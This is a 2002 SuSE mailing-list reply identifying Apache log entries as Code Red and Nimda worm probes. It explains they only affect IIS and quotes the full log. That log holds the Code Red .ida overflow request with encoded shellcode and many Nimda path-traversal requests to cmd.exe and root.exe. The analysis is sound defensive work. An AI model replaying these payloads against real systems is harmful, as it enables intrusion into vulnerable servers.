These are Code Red and Nimda worm attack signatures. The `GET /default.ida?NNNN...%u9090%u6858...` requests are Code Red probing the IIS `.ida` ISAPI extension; the `root.exe` and `winnt/system32/cmd.exe?/c+dir` requests, tried with the various `..%255c..` / `..%c1%1c..` / `..%c0%af..` path-traversal encodings, are Nimda. Both only work against Microsoft IIS, so an Apache server on Linux is not at risk, and your own log confirms it: every one of those requests was answered with a 400, 401 or 404 and nothing was executed. You can safely ignore them. I know they really clutter up the logs, though. I do not think there is a way to keep them out of the log file; this went around on the security list and I do not remember any specific resolution that would keep them out. (Anyone know of a way to avoid logging these entries? Apache's SetEnvIf on the request URI combined with a conditional CustomLog might do it, but be aware that dropping them from the log also throws away the record of which hosts are scanning you — filtering at analysis time keeps the evidence.) Jim 03/12/02 05:19:04 PM, Landy Roman wrote: > >I saw these entries in my web log. Is there anything I can do about this? > > > >61.182.248.223 - - [12/Mar/2002:07:47:44 -0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 64.133.27.115 - - [12/Mar/2002:10:23:19 >-0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - >[12/Mar/2002:10:23:20 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - >[12/Mar/2002:10:23:20 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET >/_mem_bin/..%255c../..%255c../..% 255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1% 1c../winnt >/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - >[12/Mar/2002:10:23:21 
-0500] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 >64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 >64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >202.5.152.215 - - [12/Mar/2002:12:01:15 -0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 146.155.10.241 - - [12/Mar/2002:12:50:04 >-0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 212.205.99.248 - - [12/Mar/2002:13:07:02 >-0500] "GET >/default.ida? 
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 > >-- >To unsubscribe send e-mail to suse-linux-e-unsubscribe@suse.com >For additional commands send e-mail to suse-linux-e-help@suse.com >Also check the FAQ at http://www.suse.com/support/faq and the >archives at http://lists.suse.com > >